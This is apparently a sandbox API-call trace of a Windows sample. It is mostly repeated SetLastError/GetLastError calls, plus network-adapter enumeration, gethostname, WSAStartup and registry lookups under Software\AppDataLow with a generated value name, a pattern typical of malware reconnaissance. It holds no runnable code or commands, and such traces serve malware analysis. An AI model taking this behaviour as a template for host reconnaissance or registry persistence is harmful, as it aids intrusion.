	[0086.285] SetLastError (dwErrCode=0x0) 
	[0086.285] GetLastError () returned 0x0
	[0086.285] SetLastError (dwErrCode=0x0) 
	[0086.285] GetLastError () returned 0x0
	[0086.285] SetLastError (dwErrCode=0x0) 
	[0086.285] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.287] SetLastError (dwErrCode=0x0) 
	[0086.287] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.288] SetLastError (dwErrCode=0x0) 
	[0086.288] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.289] GetLastError () returned 0x0
	[0086.289] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.290] SetLastError (dwErrCode=0x0) 
	[0086.290] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.291] SetLastError (dwErrCode=0x0) 
	[0086.291] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.292] SetLastError (dwErrCode=0x0) 
	[0086.292] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.293] SetLastError (dwErrCode=0x0) 
	[0086.293] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.294] SetLastError (dwErrCode=0x0) 
	[0086.294] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.295] SetLastError (dwErrCode=0x0) 
	[0086.295] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.296] GetLastError () returned 0x0
	[0086.296] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.297] GetLastError () returned 0x0
	[0086.297] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.298] SetLastError (dwErrCode=0x0) 
	[0086.298] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.299] SetLastError (dwErrCode=0x0) 
	[0086.299] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.300] SetLastError (dwErrCode=0x0) 
	[0086.300] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.301] SetLastError (dwErrCode=0x0) 
	[0086.301] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.302] SetLastError (dwErrCode=0x0) 
	[0086.302] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.303] GetLastError () returned 0x0
	[0086.303] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.304] SetLastError (dwErrCode=0x0) 
	[0086.304] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.305] SetLastError (dwErrCode=0x0) 
	[0086.305] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.306] SetLastError (dwErrCode=0x0) 
	[0086.306] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.307] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.307] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.307] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.307] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.307] GetLastError () returned 0x0
	[0086.307] SetLastError (dwErrCode=0x0) 
	[0086.311] SetLastError (dwErrCode=0x0) 
	[0086.311] GetLastError () returned 0x0
	[0086.311] SetLastError (dwErrCode=0x0) 
	[0086.311] LoadLibraryA (lpLibFileName="iphlpapi.dll") returned 0x71d30000
	[0086.312] GetProcAddress (hModule=0x71d30000, lpProcName="GetNetworkParams") returned 0x71d3c4f0
	[0086.312] GetProcAddress (hModule=0x71d30000, lpProcName="GetAdaptersAddresses") returned 0x71d35b70
	[0086.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74aa0000
	[0086.312] GetProcAddress (hModule=0x74aa0000, lpProcName="SystemFunction036") returned 0x74682a60
	[0086.312] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.313] SetLastError (dwErrCode=0x0) 
	[0086.313] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.314] SetLastError (dwErrCode=0x0) 
	[0086.314] GetLastError () returned 0x0
	[0086.315] SetLastError (dwErrCode=0x0) 
	[0086.315] GetLastError () returned 0x0
	[0086.315] SetLastError (dwErrCode=0x0) 
	[0086.315] GetLastError () returned 0x0
	[0086.315] SetLastError (dwErrCode=0x0) 
	[0086.315] GetAdaptersAddresses () returned 0x0
	[0086.411] GetLastError () returned 0x0
	[0086.411] SetLastError (dwErrCode=0x0) 
	[0086.411] GetLastError () returned 0x0
	[0086.411] SetLastError (dwErrCode=0x0) 
	[0086.411] SetLastError (dwErrCode=0x0) 
	[0086.411] GetLastError () returned 0x0
	[0086.411] SetLastError (dwErrCode=0x0) 
	[0086.411] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] SetLastError (dwErrCode=0x0) 
	[0086.412] GetLastError () returned 0x0
	[0086.413] SetLastError (dwErrCode=0x0) 
	[0086.413] strncmp (_Str1="fec0:0:0:ffff:", _Str2="fec0:0:0:ffff:", _MaxCount=0xe) returned 0
	[0086.413] strncmp (_Str1="fec0:0:0:ffff:", _Str2="fec0:0:0:ffff:", _MaxCount=0xe) returned 0
	[0086.413] GetLastError () returned 0x0
	[0086.413] SetLastError (dwErrCode=0x0) 
	[0086.413] GetLastError () returned 0x0
	[0086.413] SetLastError (dwErrCode=0x0) 
	[0086.413] SetLastError (dwErrCode=0x0) 
	[0086.413] GetLastError () returned 0x0
	[0086.413] SetLastError (dwErrCode=0x0) 
	[0086.413] SetLastError (dwErrCode=0x2) 
	[0086.413] GetLastError () returned 0x2
	[0086.414] htons (hostshort=0x35) returned 0x3500
	[0086.414] htons (hostshort=0x35) returned 0x3500
	[0086.415] gethostname (name=0x53b758, namelen=64) 

Thread:
	id = 62
	os_tid = 0x4d4

	[0071.056] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x247fdcc | out: lpWSAData=0x247fdcc) returned 0
	[0071.060] OutputDebugStringA (lpOutputString="WMA 0") 
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.061] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x247fd1c, lpdwDisposition=0x0 | out: phkResult=0x247fd1c*=0x1ac, lpdwDisposition=0x0) returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.062] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] wsprintfW (in: param_1=0x247fd40, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0071.063] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x247fcf0, lpdwDisposition=0x0 | out: phkResult=0x247fcf0*=0x1b0, lpdwDisposition=0x0) returned 0x0
	[0071.063] RegQueryValueExW (in: hKey=0x1b0, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x247fce4, lpData=0x0, lpcbData=0x247fcf0*=0x0 | out: lpType=0x247fce4*=0x0, lpData=0x0, lpcbData=0x247fcf0*=0x0) returned 0x2
	[0071.063] RegCloseKey (hKey=0x1b0) returned 0x0
	[0071.063] RegCloseKey (hKey=0x1ac) returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.063] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
